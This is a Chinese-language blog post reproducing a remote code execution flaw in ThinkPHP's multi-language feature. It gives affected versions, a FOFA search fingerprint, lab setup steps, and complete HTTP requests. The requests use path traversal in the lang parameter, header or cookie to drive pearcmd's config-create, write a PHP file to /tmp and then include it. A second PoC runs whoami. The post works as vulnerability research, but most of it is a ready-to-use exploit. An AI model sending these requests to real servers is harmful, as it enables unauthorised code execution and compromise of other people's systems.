前言
如果 Thinkphp 程序开启了多语言功能,那就可以通过 get、header、cookie 等位置传入参数,实现目录穿越+文件包含,通过 pearcmd 文件包含这个 trick 即可实现 RCE。
影响范围
v6.0.1 < Thinkphp < v6.0.13
Thinkphp v5.0.x
Thinkphp v5.1.x
fofa指纹
header="think_lang"
漏洞复现
不同版本打开多语言
- thinkphp6
将文件中多语言加载的注释去掉即可
app/middleware.php :
<?php
// 全局中间件定义文件
return [
// 全局请求缓存
// \think\middleware\CheckRequestCache::class,
// 多语言加载
\think\middleware\LoadLangPack::class,
// Session初始化
// \think\middleware\SessionInit::class
];
- thinkphp5
测试使用的版本为5.0.23,所以只在application/config.php中修改了
config/app.php
application/config.php
'lang_switch_on' => true
前置知识点
PS:怕有人不看参考文章,所以直接把重点从p牛的文章中复制过来
pecl是PHP中用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库。在7.3及以前,pecl/pear是默认安装的;在7.4及以后,需要我们在编译PHP的时候指定--with-pear才会安装。
不过,在Docker任意版本镜像中,pcel/pear都会被默认安装,安装的路径在/usr/local/lib/php。
该文件存在一个命令为config-create
,可以创建一个文件,这个命令需要传入两个参数,其中第二个参数是写入的文件路径,第一个参数会被写入到这个文件中。
复现环境搭建
- 方法一(简单办法)
docker pull vulfocus/thinkphp:6.0.12
- 方法二(麻烦办法,也是我一开始采用的办法)
1.git clone https://github.com/top-think/think.git think_git
2.更改 composer.json ,安装 v6.0.12 :
"require": {
"php": ">=7.2.5",
"topthink/framework": "6.0.12",
"topthink/think-orm": "^2.0"
},
3.composer install
4.然后打开多语言功能
5.启动 docker compose :
version: "3.3" # optional since v1.27.0
services:
web:
image: php:7.4-apache
ports:
- "8888:80"
volumes:
- /var/www/think_git:/var/www/html
通过get传参写入文件并包含
- 直接利用p牛文章中的请求包,需要根据实际情况改变文件名称,写不进去可以考虑多加点../
GET /public/index.php?lang=../../../../../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?=phpinfo()?>+/tmp/1.php HTTP/1.1
Host: 192.168.59.151:8888
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
- 文件包含
GET /think/public/index.php?lang=../../../../../../../../../../../../tmp/1 HTTP/1.1
Host: 192.168.59.151:8888
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
通过header传参写入文件并包含
在config/lang.php中可以发现通过header和cookie传参的变量名分别为think-lang
和thing_lang
,尝试进行复现
// 多语言cookie变量
'cookie_var' => 'think_lang',
// 多语言header变量
'header_var' => 'think-lang',
复现数据包
- 创建文件
GET /think/public/index.php?+config-create+/&/<?=phpinfo()?>+/tmp/2.php HTTP/1.1
Host: 192.168.59.151:8888
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
think-lang:../../../../../../../../../../../../../../usr/local/lib/php/pearcmd
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
- 文件包含
GET /think/public/index.php?lang=../../../../../../../../../../../../tmp/2 HTTP/1.1
Host: 192.168.59.151:8888
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
通过cookie传参写入文件并包含
- 写入文件
GET /think/public/index.php?+config-create+/&/<?=phpinfo()?>+/tmp/3.php HTTP/1.1
Host: 192.168.59.151:8888
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:think_lang=../../../../../../../../../../../../../../usr/local/lib/php/pearcmd
Connection: close
- 文件包含
GET /think/public/index.php?lang=../../../../../../../../../../../../tmp/3 HTTP/1.1
Host: 192.168.59.151:8888
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
在网上也看到了另一个poc,但是很可惜并没有复现成功,有师傅成功了的话求教
/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=whoami
本博客所有文章如无特别注明均为原创。作者:小陈 ,复制或转载请以超链接形式注明转自 小陈's Blog - 致力关注于黑客技术、渗透测试、网络信息安全 。
原文地址《Thinkphp lang RCE复现》
原文地址《Thinkphp lang RCE复现》
发表评论